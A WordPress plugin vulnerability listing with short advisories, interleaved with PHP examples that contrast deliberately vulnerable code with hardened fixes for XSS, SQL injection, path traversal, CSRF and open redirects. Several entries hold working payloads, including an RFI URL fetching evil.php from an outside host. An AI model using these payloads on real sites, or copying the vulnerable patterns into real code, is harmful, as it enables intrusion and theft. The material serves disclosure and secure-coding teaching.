4359 matches found
Ninja Tables < 4.1.8 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitise and escape some of its table fields, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. Create a table, add a column with the following payload " as Name, then add data with the following...
Perfect Survey < 1.5.2 - Reflected Cross-Site Scripting
The plugin does not sanitise and escape multiple parameters (id and filterssessionid of the singlestatistics page, type and message of the importexport page) before outputting them back in pages/attributes in the admin dashboard, leading to Reflected Cross-Site Scripting issues...
Final Tiles Gallery < 3.4.19 - Authenticated Stored Cross-Site Scripting (XSS)
Multiple cross-site scripting vulnerabilities in Final Tiles Gallery 3.4.18 and lower allow remote attackers to inject arbitrary web script or HTML via the Title and Caption fields of an image. Successful exploitation of this vulnerability would allow an authenticated high-privileged user (author+)...
TownHub < 1.0.6 - Multiple Vulnerabilities
Multiple vulnerabilities were discovered in the 'TownHub - Directory & Listing WordPress Theme', tested version v1.0.2: - Unauthenticated XSS - Authenticated Persistent XSS - IDOR Edit. WPScan team: December 27th, 2019 - Envato contacted January 5th, 2020 - Envato investigating January 6th, 2020 -...
Quick Adsense < 2.8.2 - Subscriber+ Post Stats Reset
The plugin does not have authorisation and CSRF checks in some of its AJAX actions, allowing any authenticated user, such as a subscriber, to call them and reset post stats, for example: fetch("/wp-admin/admin-ajax.php", { "headers": { "accept": "*/*", "accept-language": "en-US,en;q=0.9", "content-type":...
DW Question & Answer Pro <= 1.3.4 - Multiple CSRF
The plugin does not properly check for CSRF in some of its functions, allowing attackers to make logged in users perform unwanted actions, such as updating a comment or a question status. Vendor was notified via Envato on September 28th, 2021, but did not properly fix the issue and was notified...
WP Dependency Installer < 4.3.1 - Subscriber+ Arbitrary Plugin Activation
The wp-dependency-installer library, used in several plugins, does not have authorisation and CSRF checks in its dependencyinstaller AJAX action with the activate method, allowing any authenticated user, such as a subscriber, to activate arbitrary plugins installed on the blog. Furthermore, despite havin...
MOLIE <= 0.5 - Reflected Cross-Site Scripting
The plugin does not escape the courseid parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting issue: https://example.com/wp-admin/admin.php?page=moliecoursecheck&courseid=alert(/XSS/)...
EditableTable <= 0.1.4 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitise and escape any of the Table and Column fields, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. Create a new EDTB and put the following payload in the Table Name, Column Name or Column...
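The Ninja Tables and EditableTable entries above, like the other Admin+ stored XSS entries in this list, share one root cause: a setting is stored raw and echoed raw, so an administrator who does not hold the unfiltered_html capability (multisite, or DISALLOW_UNFILTERED_HTML set) can still plant script through the settings screen. The following is an added example written for this page, not code from any of the listed plugins; it assumes WordPress is loaded, and the demo_tbl_* option names and the demo_tbl_save nonce action are hypothetical. It shows the vulnerable pattern next to a hardened one, including the numeric-setting case (a pixel size echoed into a style block) that the HTML5 Responsive FAQ entry further down describes.

```php
<?php
// Added example, not code from any plugin listed on this page. Assumes WordPress is loaded.
// Option names (demo_tbl_*) and the nonce action "demo_tbl_save" are hypothetical.

// --- VULNERABLE: raw in, raw out -------------------------------------------------------
function demo_tbl_save_vulnerable() {
    if ( isset( $_POST['back_button_text'], $_POST['font_px'] ) ) {
        update_option( 'demo_tbl_back_button_text', wp_unslash( $_POST['back_button_text'] ) );
        update_option( 'demo_tbl_font_px', wp_unslash( $_POST['font_px'] ) );
    }
}

function demo_tbl_render_vulnerable() {
    $text = get_option( 'demo_tbl_back_button_text', '' );
    $px   = get_option( 'demo_tbl_font_px', 14 );
    // "><img src onerror=alert(1)> leaves the attribute; <script> lands in the text node;
    // 14px}</style><script>... leaves the style block. Nothing is escaped anywhere.
    echo '<input type="text" name="back_button_text" value="' . $text . '">';
    echo '<button>' . $text . '</button>';
    echo '<style>.demo-tbl { font-size: ' . $px . 'px }</style>';
}

// --- HARDENED: capability + nonce on save, sanitise on input, escape per context on output --
function demo_tbl_save_hardened() {
    if ( ! isset( $_POST['back_button_text'], $_POST['font_px'] ) ) {
        return;
    }
    // Admin-only, plus a nonce so a CSRF page cannot submit this form on the admin's behalf.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'forbidden', '', array( 'response' => 403 ) );
    }
    check_admin_referer( 'demo_tbl_save', 'demo_tbl_nonce' );

    // sanitize_text_field() strips tags and encodes stray '<' regardless of whether the
    // current user holds unfiltered_html. A pixel size is an integer, so store an integer.
    $text = sanitize_text_field( wp_unslash( $_POST['back_button_text'] ) );
    $px   = absint( $_POST['font_px'] );
    update_option( 'demo_tbl_back_button_text', $text );
    update_option( 'demo_tbl_font_px', $px > 0 ? $px : 14 );
}

function demo_tbl_render_hardened() {
    $text = get_option( 'demo_tbl_back_button_text', '' );
    $px   = absint( get_option( 'demo_tbl_font_px', 14 ) );
    // Escape on output as well: the option may have been written by an import, a REST
    // route or an older plugin version that did not sanitise, so stored data is not trusted.
    echo '<form method="post">';
    wp_nonce_field( 'demo_tbl_save', 'demo_tbl_nonce' );
    echo '<input type="text" name="back_button_text" value="' . esc_attr( $text ) . '">';
    echo '<input type="number" name="font_px" value="' . esc_attr( $px ) . '">';
    echo '<button>' . esc_html( $text ) . '</button>';
    echo '</form>';
    // The integer cast is the "escape" for a numeric CSS/JS context; no esc_* helper applies.
    echo '<style>.demo-tbl { font-size: ' . $px . 'px }</style>';
}
```

If a setting legitimately holds HTML (an intro paragraph, say), store it through wp_kses_post() and output it through wp_kses_post() rather than esc_html(); what must never happen is storing raw markup because the user "is an admin", since that is exactly the case DISALLOW_UNFILTERED_HTML and multisite are meant to close.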
Leads-5050 Visitor Insights < 1.0.4 - Unauthenticated License Change
The leads5050setlicense AJAX action was available to unauthenticated users, allowing them to set an arbitrary license in the plugin's settings: POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip,...
Comments - wpDiscuz 7.0.0 - 7.0.4 - Unauthenticated Arbitrary File Upload
This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site's server. POST /wp-admin/admin-ajax.php HTTP/1.1 Host: URL Content-Length: 774 Accept: */* X-Requested-With: XMLHttpRequest User-Agent:...
Avada Theme <= 5.1.4 - Stored Cross-Site Scripting (XSS) & CSRF
Description: The Avada WordPress theme was affected by Stored Cross-Site Scripting (XSS) and CSRF security vulnerabilities. http://cdn.wphutte.com/Avada/5.1.4/xss.html http://cdn.wphutte.com/Avada/5.1.4/csrf.html...
WP125 < 1.5.5 - Arbitrary Ad Deletion via CSRF
The plugin does not have CSRF checks in various actions, for example when deleting an ad, allowing attackers to make a logged in admin delete ads via a CSRF attack: https://example.com/wp-admin/admin.php?page=wp125addedit&deletead=1...
LiteSpeed Cache < 4.4.4 - IP Check Bypass to Unauthenticated Stored XSS
The plugin does not properly verify that requests are coming from QUIC.cloud servers, allowing attackers to make requests to certain endpoints by using a specific X-Forwarded-For header value. In addition, one of the endpoints could be used to set CSS code if a setting is enabled, which will then ...
Support Board < 3.3.6 - Arbitrary File Deletion via CSRF
The plugin does not have any CSRF checks in the actions handled by the include/ajax.php file, which could allow attackers to make logged in users perform unwanted actions, for example make an admin delete arbitrary files...
DiveBook <= 1.1.4 - Unauthenticated Reflected XSS
A reflected Cross-Site Scripting vulnerability exists within the DiveBook log's filter functionality. Arbitrary URL parameters are reflected into the application's response, rendered by the browser as HTML or JavaScript. An attacker may abuse this functionality by sending a victim a crafted link...
HyperComments <= 1.2.2 - Unauthenticated Arbitrary File Deletion
The plugin does not validate and sanitise user input which is concatenated to create a file path passed to unlink(), leading to an arbitrary file deletion issue. For more details about this issue, please see the reference. File: hypercomments/hypercomments.php:112 $filename =...
Download Monitor < 4.5.91 - Admin+ Arbitrary File Download
The plugin does not ensure that files to be downloaded are inside the blog folders and are not sensitive, allowing high privilege users such as admins to download wp-config.php or /etc/passwd even in a hardened environment or multisite setup. Create a new download, add a file and put the followi...
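The HyperComments (unlink) and Download Monitor (file download) entries above are the same bug in two directions: a request-controlled string becomes a filesystem path without any proof that it stays inside the directory the plugin is meant to operate on. The example below is added here and is not code from either plugin; it assumes WordPress is loaded and uses hypothetical demo_file_* function names. The containment check resolves the path with realpath() and compares it against the resolved base directory, which also catches symlinks that point outside the uploads tree.

```php
<?php
// Added example, not code from Download Monitor or HyperComments. Assumes WordPress is loaded.
// The demo_file_* names and the "demo_file_delete" nonce action are hypothetical.

// --- VULNERABLE: request data concatenated straight into a path ------------------------
function demo_file_serve_vulnerable( $file_param ) {
    // "../../wp-config.php" walks out of the directory; an absolute path is not even checked.
    readfile( WP_CONTENT_DIR . '/uploads/' . $file_param );
}
function demo_file_delete_vulnerable( $file_param ) {
    unlink( WP_CONTENT_DIR . '/uploads/hc/' . $file_param );
}

// --- HARDENED: resolve the path and prove it lies under the allowed base directory -------
function demo_file_resolve( $relative, $base = null ) {
    if ( null === $base ) {
        $upload = wp_upload_dir();
        $base   = $upload['basedir'];
    }
    // validate_file() returns non-zero for '..', ':' and Windows drive prefixes.
    if ( 0 !== validate_file( $relative ) ) {
        return false;
    }
    $base_real = realpath( $base );
    $real      = realpath( $base . '/' . $relative );
    if ( false === $base_real || false === $real ) {
        return false; // unresolvable base, or the file does not exist
    }
    // Compare with a trailing separator so that "/uploads-evil" does not match "/uploads".
    // realpath() has already followed symlinks, so a link to /etc/passwd fails this test.
    $base_real = rtrim( $base_real, '/\\' ) . DIRECTORY_SEPARATOR;
    if ( 0 !== strncmp( $real, $base_real, strlen( $base_real ) ) ) {
        return false;
    }
    return is_file( $real ) ? $real : false;
}

function demo_file_serve_hardened( $file_param ) {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'forbidden', '', array( 'response' => 403 ) );
    }
    $path = demo_file_resolve( sanitize_text_field( wp_unslash( $file_param ) ) );
    if ( false === $path ) {
        wp_die( 'invalid file', '', array( 'response' => 400 ) );
    }
    // wp_check_filetype() returns an empty ext for anything outside the allowed MIME list,
    // so executable/server files are refused even for admins in a multisite or hardened setup.
    $type = wp_check_filetype( $path );
    if ( empty( $type['ext'] ) ) {
        wp_die( 'type not allowed', '', array( 'response' => 400 ) );
    }
    header( 'Content-Type: ' . $type['type'] );
    header( 'Content-Disposition: attachment; filename="' . basename( $path ) . '"' );
    readfile( $path );
    exit;
}

function demo_file_delete_hardened( $file_param ) {
    check_admin_referer( 'demo_file_delete' );          // CSRF
    if ( ! current_user_can( 'manage_options' ) ) {    // authorisation
        wp_die( 'forbidden', '', array( 'response' => 403 ) );
    }
    $path = demo_file_resolve( sanitize_text_field( wp_unslash( $file_param ) ) );
    return ( false !== $path ) && unlink( $path );
}
```

The base directory is a parameter on purpose: a plugin that serves from its own data folder passes that folder, and the same containment logic applies. What it must never be is ABSPATH, since wp-config.php lives there (or one level above it).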
Shortcode Addons < 3.1.0 - Unauthenticated Arbitrary Option Update
The plugin does not have any authorisation on its REST API endpoints; one of them could allow unauthenticated attackers to update arbitrary blog options. POST /wp-json/ShortCodeAddonsUltimate/v2/addonssettings HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate...
Typebot < 1.4.3 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitise and escape the Publish ID setting, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. Put the following payload in the 'Publish ID or Full URL' setting and save: "...
Perfect Survey < 1.5.2 - Unauthorised AJAX Call to Stored XSS / Survey Settings Update
The plugin does not have proper authorisation or CSRF checks in the saveglobalsetting AJAX action, allowing unauthenticated users to edit surveys and modify settings. Given the lack of sanitisation and escaping in the settings, this could also lead to a Stored Cross-Site Scripting issue which wi...
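Quick Adsense, WP Dependency Installer, Shortcode Addons and Perfect Survey above, and PublishPress Capabilities further down, all describe a state-changing handler that is reachable without a nonce, without a capability check, or both; two of them also write whichever option name the request names. The added example below is not code from any of these plugins. It assumes WordPress is loaded; the action name demo_survey_save_setting, the demo_survey_* options and the script handle demo-survey-admin (assumed registered elsewhere with wp_register_script()) are hypothetical. The point it makes beyond the entries themselves is that the three checks are independent: the nonce proves intent, the capability proves privilege, and the option allowlist proves scope.

```php
<?php
// Added example, not code from any plugin listed on this page. Assumes WordPress is loaded.
// The action name, the demo_survey_* options and the script handle are hypothetical.

// --- VULNERABLE (left unhooked here): anonymous reach, no nonce, no capability, any option --
// add_action( 'wp_ajax_demo_survey_save_setting',        'demo_survey_save_vulnerable' );
// add_action( 'wp_ajax_nopriv_demo_survey_save_setting', 'demo_survey_save_vulnerable' );
function demo_survey_save_vulnerable() {
    // option=default_role&value=administrator turns every later registration into an admin.
    update_option( wp_unslash( $_POST['option'] ), wp_unslash( $_POST['value'] ) );
    wp_send_json_success();
}

// --- HARDENED ------------------------------------------------------------------------------
// Logged-in hook only: a handler that changes state gets no wp_ajax_nopriv_ registration.
add_action( 'wp_ajax_demo_survey_save_setting', 'demo_survey_save_hardened' );

// Option name => sanitiser. Anything not in this map is refused, so the handler can only
// ever touch the plugin's own rows in wp_options, never default_role or siteurl.
function demo_survey_allowed_settings() {
    return array(
        'demo_survey_title'     => 'sanitize_text_field',
        'demo_survey_intro'     => 'wp_kses_post',
        'demo_survey_max_votes' => 'absint',
        'demo_survey_redirect'  => 'esc_url_raw',
    );
}

function demo_survey_save_hardened() {
    // 1. CSRF: nonce tied to this action and this user; check_ajax_referer() dies if it is
    //    missing or stale, so nothing below runs on a forged cross-site request.
    check_ajax_referer( 'demo_survey_save_setting', 'nonce' );

    // 2. Authorisation: a valid nonce proves the request came from a page the site served
    //    to *this* user, not that the user may do this. Subscribers receive nonces too.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 3. Scope: only an allowlisted option name.
    $allowed = demo_survey_allowed_settings();
    $key     = isset( $_POST['option'] ) ? sanitize_key( wp_unslash( $_POST['option'] ) ) : '';
    if ( ! isset( $allowed[ $key ] ) ) {
        wp_send_json_error( 'unknown setting', 400 );
    }

    // 4. Per-setting sanitiser, so a stored XSS payload cannot ride in on the value.
    $value = isset( $_POST['value'] ) ? wp_unslash( $_POST['value'] ) : '';
    $value = call_user_func( $allowed[ $key ], $value );

    update_option( $key, $value );
    wp_send_json_success( array( 'option' => $key ) );
}

// Where the nonce comes from: generated per page load for the admin's script.
function demo_survey_admin_assets() {
    wp_localize_script( 'demo-survey-admin', 'demoSurvey', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'demo_survey_save_setting' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'demo_survey_admin_assets' );
```

The same three checks map onto a REST route: register_rest_route() takes a permission_callback (the capability check), REST requests carry the nonce in the X-WP-Nonce header, and the route's args array is where the allowlist and sanitize_callback live. A permission_callback of __return_true on a route that writes options is the REST form of the Shortcode Addons entry.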
Payment Form For Paypal Pro < 1.1.65 - Unauthenticated SQL Injection
The 'query' parameter allowed any unauthenticated user to perform SQL queries, with the result output to a web page in JSON format: https://example.com/?cffaction=getdatafromdatabase&query=SELECT%20*%20from%20wp_posts...
3DPrint < 3.5.6.9 - CSRF to Arbitrary File Download
Description: The plugin does not protect against CSRF attacks in the modified version of Tiny File Manager included with the plugin, allowing an attacker to craft a malicious request that will create an archive of any files or directories on the target server by tricking a logged in admin into...
Kunze Law < 2.1 - Admin+ Stored Cross-Site Scripting
The plugin does not escape its 'E-Mail Error "From" Address' setting, allowing high privilege users such as admins to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. Put the following payload in the 'E-Mail Error "From" Address' setting of the plugin:...
CorreosExpress <= 2.6.0 - Sensitive Information Disclosure
The plugin generates log files which are publicly accessible, and contain sensitive information such as sender/receiver names, phone numbers, physical and email addresses https://example.com/wp-content/plugins/correos-express/log/logcronfunction.txt...
Ultimate Member < 2.1.12 - Unauthenticated Privilege Escalation via User Roles
Due to the lack of filtering on the role parameter that could be supplied during the registration process, an attacker could supply the role parameter with a WordPress capability or any custom Ultimate Member role and effectively be granted those privileges. $username, 'firstname-'. $formid =...
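The Ultimate Member entry above is a privilege escalation through a field the server should never have read: the role is an attribute of the form the site owner built, not of the submission. The example below is added here and is not Ultimate Member's code; it assumes WordPress is loaded, and the demo_reg_* names and the demo_reg_form_roles option are hypothetical. It also covers the edge the entry does not spell out: if the role is looked up server side but falls back to the default_role option, a poisoned default_role (see the arbitrary option update entries on this page) still hands out administrator, so the allowlist is applied to the looked-up value as well.

```php
<?php
// Added example, not Ultimate Member's code. Assumes WordPress is loaded.
// The demo_reg_* names and the demo_reg_form_roles option are hypothetical.

// --- VULNERABLE: the role (or a capability name) is read from the registration POST -------
function demo_reg_vulnerable( $username, $email, $password ) {
    $user_id = wp_create_user( $username, $password, $email );
    if ( is_wp_error( $user_id ) ) {
        return $user_id;
    }
    // role=administrator in the form body is honoured as-is.
    $role = isset( $_POST['role'] ) ? wp_unslash( $_POST['role'] ) : get_option( 'default_role' );
    $user = new WP_User( $user_id );
    $user->set_role( $role );
    return $user_id;
}

// --- HARDENED: the role is looked up server side and validated against an allowlist -------
function demo_reg_choose_role( $form_id ) {
    // Per-form role chosen by an administrator when the form was built (assumed to be
    // stored in an option, e.g. array( 7 => 'subscriber' )).
    $configured = get_option( 'demo_reg_form_roles', array() );
    $role       = isset( $configured[ $form_id ] ) ? $configured[ $form_id ] : get_option( 'default_role' );

    // Only roles that exist AND that a visitor may self-assign. Applying the allowlist to the
    // default_role fallback too means a poisoned default_role option cannot mint admins here.
    $self_assignable = array( 'subscriber', 'customer' ); // site-specific choice
    if ( ! wp_roles()->is_role( $role ) || ! in_array( $role, $self_assignable, true ) ) {
        return 'subscriber';
    }
    return $role;
}

function demo_reg_hardened( $username, $email, $password, $form_id ) {
    $user_id = wp_create_user( $username, $password, $email );
    if ( is_wp_error( $user_id ) ) {
        return $user_id;
    }
    $user = new WP_User( $user_id );
    // set_role() replaces the user's roles with one validated name. Never call add_cap()
    // with request data: that is how a capability name smuggled in as a "role" is granted.
    $user->set_role( demo_reg_choose_role( absint( $form_id ) ) );
    return $user_id;
}
```

The $form_id itself still comes from the request, which is fine: it selects among configurations an administrator created, and an unknown id falls through to the most restrictive choice.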
Official MailerLite Sign Up Forms < 1.4.4 - Unauthenticated SQL Injection
Most methods in the MailerLite plugin do not sanitise user input, which causes SQL injection. Also, no method checks for a nonce token, which causes a CSRF issue everywhere. One example would be to inject the payload 1 union all select database(),2,3,1,5 into the formid GET parameter of th...
Forym <= 1.5.8 - Reflected Cross-Site Scripting
The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting. On a blog having the plugin and the Search Forum Widget active, append the following parameter: ?s="...
10Web Social Photo Feed < 1.4.29 - Reflected Cross-Site Scripting (XSS)
The plugin was affected by a reflected Cross-Site Scripting (XSS) vulnerability in the wdiapplychanges admin page, allowing an attacker to perform such an attack against any logged in user...
Post Duplicator < 2.27 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitise and escape its Duplicate Title and Slug settings, which could allow high privilege users such as admins to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. Put the following payload in the "Duplicate Title" or "Duplicate Slug"...
GRAND FlaGallery <= 6.1.2 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitise and escape some of its gallery settings, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. Create/edit a gallery and put the following payload in the "Back Button Text" setting, then...
Speed Booster Pack < 4.3.3.1 - Admin+ SQL Injection
The plugin does not escape the sbpconverttablename parameter before using it in a SQL statement to convert the related table, leading to an SQL injection: https://example.com/wp-admin/admin-ajax.php?action=sbpdatabaseaction&sbpaction=converttables&sbpconverttablename=SQLi&nonce=b2d6208254 The nonc...
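The Payment Form for Paypal Pro, MailerLite and Speed Booster Pack entries above are three shapes of the same defect, and the third is the one practitioners get wrong: a value (the form id) can be bound with a $wpdb->prepare() placeholder, but an identifier (the table name) cannot, so escaping does nothing and an allowlist is the only real fix. The example below is added here and is not code from any of those plugins; it assumes WordPress is loaded (the global $wpdb) and the demo_* function and table names are hypothetical.

```php
<?php
// Added example, not code from Speed Booster Pack, MailerLite or the Paypal plugin.
// Assumes WordPress is loaded. The demo_* function names and the demo_forms table are hypothetical.

// --- VULNERABLE: request data interpolated into SQL -------------------------------------
function demo_form_get_vulnerable( $form_id ) {
    global $wpdb;
    // form_id = "1 union all select database(),2,3" executes as written.
    return $wpdb->get_results( "SELECT * FROM {$wpdb->prefix}demo_forms WHERE id = $form_id" );
}
function demo_convert_table_vulnerable( $table ) {
    global $wpdb;
    // esc_sql() would not help: the injection point is outside any quotes.
    return $wpdb->query( "ALTER TABLE $table ENGINE=InnoDB" );
}

// --- HARDENED -----------------------------------------------------------------------------
function demo_form_get_hardened( $form_id ) {
    global $wpdb;
    // %d forces an integer; the raw string never reaches the query text.
    return $wpdb->get_results( $wpdb->prepare(
        "SELECT id, name FROM {$wpdb->prefix}demo_forms WHERE id = %d",
        $form_id
    ) );
}

function demo_form_search_hardened( $term ) {
    global $wpdb;
    // %s is quoted and escaped by prepare(); esc_like() keeps user-supplied % and _ literal
    // so a search term cannot widen the LIKE pattern.
    $like = '%' . $wpdb->esc_like( $term ) . '%';
    return $wpdb->get_results( $wpdb->prepare(
        "SELECT id, name FROM {$wpdb->prefix}demo_forms WHERE name LIKE %s",
        $like
    ) );
}

function demo_convert_table_hardened( $table ) {
    global $wpdb;
    // Identifiers cannot be bound with %s/%d. Allowlist: the tables WordPress itself knows
    // for this site, plus the plugin's own. Anything else is refused, not "escaped".
    $known   = $wpdb->tables( 'all', true );        // e.g. array( 'posts' => 'wp_posts', ... )
    $known[] = $wpdb->prefix . 'demo_forms';
    if ( ! in_array( $table, $known, true ) ) {
        return false;
    }
    // $table is now one of our own fixed strings; backquoting guards against reserved words.
    return $wpdb->query( "ALTER TABLE `{$table}` ENGINE=InnoDB" );
}
```

On WordPress 6.2 and later $wpdb->prepare() accepts a %i placeholder for identifiers, which quotes and escapes the name; it still does not decide whether the caller should be allowed to touch that table, so the allowlist stays. The nonce visible in the Speed Booster Pack URL is the CSRF check; it does nothing for injection, which is why the entry is Admin+ rather than unauthenticated.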
Content Egg < 5.3.1 - Reflected Cross-Site Scripting
The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting: https://example.com/wp-admin/admin.php?page=content-egg-autoblog-edit&a"alert(/XSS/)...
WPML <= 3.6.3 - Unauthenticated Stored Cross-Site Scripting (XSS)
The sitepress-multilingual-cms WordPress plugin was affected by an Unauthenticated Stored Cross-Site Scripting (XSS) security vulnerability. POST /wp-admin/admin.php?page=sitepress-multilingual-cms-3.6.3%2Fmenu%2Ftheme-localization.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 Windows NT 6.1...
Easy Social Icons < 3.2.0 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitise and escape its saved settings before outputting them in attributes, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. 3.1.3 added some escaping, but data was output elsewhere. Put the...
Adaptive Images < 0.6.69 - Reflected Cross-Site Scripting
The plugin does not sanitise and escape REQUEST_URI before outputting it back in a page, leading to a Reflected Cross-Site Scripting issue: https://example.com/wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(/XSS/)%3E/?debug=true...
HTML5 Responsive FAQ <= 2.8.5 - Admin+ Stored Cross-Site Scripting
The plugin does not properly sanitise and escape some of its settings, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. Put the following payload in the "Text size of answer in pixels" setting: alert('XSS'); The XSS will be...
Booking Calendar < 8.9.2 - Reflected Cross-Site Scripting
The plugin does not sanitise and escape the bookingtype parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting: https://example.com/wp-admin/admin.php?page=wpbc&bookingtype=%22%3E%3Cimg+src+onerror%3Dalert%28/XSS/%29%3E%3Cscript%3E%2F%2A...
Stars Rating < 3.5.1 - Comments Denial of Service
The plugin does not validate the submitted rating, allowing submission of a very long integer, causing a Denial of Service in the comments section or in the pending comments dashboard, depending on whether the user submitted it unauthenticated or authenticated. Enable rating for a post/page, add a comment, capture the...
Modal Window < 5.2.2 - RFI leading to RCE via CSRF
The wow-company admin menu page of the plugin allows including arbitrary files with a PHP extension, as well as via the data:// or http:// wrappers, leading to RCE via CSRF. http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company&tab=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F PHP's...
Modal Survey < 2.0.1.8.2 - Authenticated PHP Object Injection
The unserialize() function is used multiple times in the code, for example when importing custom surveys. This could allow a malicious administrator to import a crafted JSON file to trigger a PHP Object Injection vulnerability: "name":"Open Text Answer Sample", "id":"924478511", "options":"", "global":"0...
Age Gate < 2.13.5 - Unauthenticated Open Redirect
The plugin uses the _wp_http_referer parameter to redirect users after some actions, as well as after invalid or missing nonces, leading to an Unauthenticated Open Redirect issue...
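The Age Gate entry above hinges on a detail that is easy to miss: _wp_http_referer is a hidden field that wp_nonce_field() emits, so it is attacker-controlled like any other form value, and the redirect on the nonce-failure path is reached precisely when the request is forged. The example below is added here and is not Age Gate's code; it assumes WordPress is loaded and the demo_gate_* names and the demo_gate nonce action are hypothetical. It contrasts wp_redirect() with wp_safe_redirect()/wp_validate_redirect(), which refuse off-site targets unless the host is on the allowed_redirect_hosts list.

```php
<?php
// Added example, not Age Gate's code. Assumes WordPress is loaded.
// The demo_gate_* names and the "demo_gate" nonce action are hypothetical.

// --- VULNERABLE: whatever arrives in _wp_http_referer becomes the Location header --------
function demo_gate_submit_vulnerable() {
    $back = isset( $_REQUEST['_wp_http_referer'] )
        ? wp_unslash( $_REQUEST['_wp_http_referer'] )
        : home_url( '/' );
    if ( ! wp_verify_nonce( isset( $_REQUEST['nonce'] ) ? $_REQUEST['nonce'] : '', 'demo_gate' ) ) {
        // Reached by any crafted link, no login needed: https://evil.example/ passes through.
        wp_redirect( $back );
        exit;
    }
    // ... record the age confirmation ...
    wp_redirect( $back );
    exit;
}

// --- HARDENED -----------------------------------------------------------------------------
// wp_validate_redirect() returns $default for off-site targets, scheme-relative tricks such
// as //evil.example, and anything it cannot parse; on-site paths are returned unchanged.
function demo_gate_target() {
    $raw = isset( $_REQUEST['_wp_http_referer'] ) ? wp_unslash( $_REQUEST['_wp_http_referer'] ) : '';
    return wp_validate_redirect( $raw, home_url( '/' ) );
}

function demo_gate_submit_hardened() {
    if ( ! wp_verify_nonce( isset( $_REQUEST['nonce'] ) ? $_REQUEST['nonce'] : '', 'demo_gate' ) ) {
        // A failed nonce means the request is not trusted at all, so do not honour any
        // request-supplied destination here: go to a fixed local page.
        wp_safe_redirect( home_url( '/' ) );
        exit;
    }
    // ... record the age confirmation ...
    // wp_safe_redirect() applies wp_validate_redirect() itself; calling it explicitly above
    // makes the fallback visible and lets the value be reused (e.g. in a rendered link).
    wp_safe_redirect( demo_gate_target() );
    exit;
}

// If a partner domain genuinely must be a target, allowlist it explicitly rather than
// switching back to wp_redirect().
add_filter( 'allowed_redirect_hosts', function ( $hosts ) {
    $hosts[] = 'partner.example'; // hypothetical
    return $hosts;
} );
```

A quick audit check for this class across a code base is every wp_redirect() whose argument traces back to $_GET, $_POST, $_REQUEST, wp_get_referer() or $_SERVER['HTTP_REFERER']; each one either becomes wp_safe_redirect() or gets a documented reason why an external target is intended.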
Autoptimize < 2.7.8 - Arbitrary File Upload via "Import Settings"
The plugin attempts to delete malicious files such as .php from the uploaded archive via the "Import Settings" feature, after its extraction. However, the extracted folders are not checked, and it is possible to upload a zip which contains a directory with a PHP file in it, which is then not remove...
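The Autoptimize entry above is a lesson about ordering as much as about recursion: deleting bad files after extraction leaves a window in which the file exists, and a non-recursive sweep never sees a file one directory down. The example below is added here and is not Autoptimize's code; it assumes WordPress is loaded and the demo_import_* names are hypothetical. It extracts into a scratch directory outside the web root, walks the whole tree, rejects the archive as a whole on the first disallowed name, and only returns paths the caller may then copy into place.

```php
<?php
// Added example, not Autoptimize's code. Assumes WordPress is loaded; the demo_import_* names are hypothetical.
require_once ABSPATH . 'wp-admin/includes/file.php'; // unzip_file(), WP_Filesystem()

// Every regular file under $dir, however deeply nested. A clean-up that only looks at the
// top level of the extraction directory is exactly what a zip holding evil/shell.php bypasses.
// Returns false if a symlink is found: an archive of settings has no business carrying one.
function demo_import_list_files( $dir ) {
    $files = array();
    $it    = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator( $dir, FilesystemIterator::SKIP_DOTS ),
        RecursiveIteratorIterator::SELF_FIRST
    );
    foreach ( $it as $entry ) {
        if ( $entry->isLink() ) {
            return false;
        }
        if ( $entry->isFile() ) {
            $files[] = $entry->getPathname();
        }
    }
    return $files;
}

// True when the name is one a web server may execute or read as configuration. Every
// dot-separated segment after the first is checked, so "x.php", "x.phtml" and "x.php.txt"
// (Apache multi-extension handling) are all caught, as are .htaccess and .user.ini.
function demo_import_is_dangerous_name( $path ) {
    $base = strtolower( basename( $path ) );
    if ( in_array( ltrim( $base, '.' ), array( 'htaccess', 'htpasswd', 'user.ini' ), true ) ) {
        return true;
    }
    $bad = array( 'php', 'php3', 'php4', 'php5', 'php7', 'php8', 'phtml', 'phar', 'phps', 'pht' );
    foreach ( array_slice( explode( '.', $base ), 1 ) as $segment ) {
        if ( in_array( $segment, $bad, true ) ) {
            return true;
        }
    }
    return false;
}

// Extract into a scratch directory OUTSIDE the web root, validate every file, and only then
// let the caller copy the accepted files into place. Returns the accepted paths or a WP_Error.
// A bad archive is rejected whole; nothing is "deleted afterwards".
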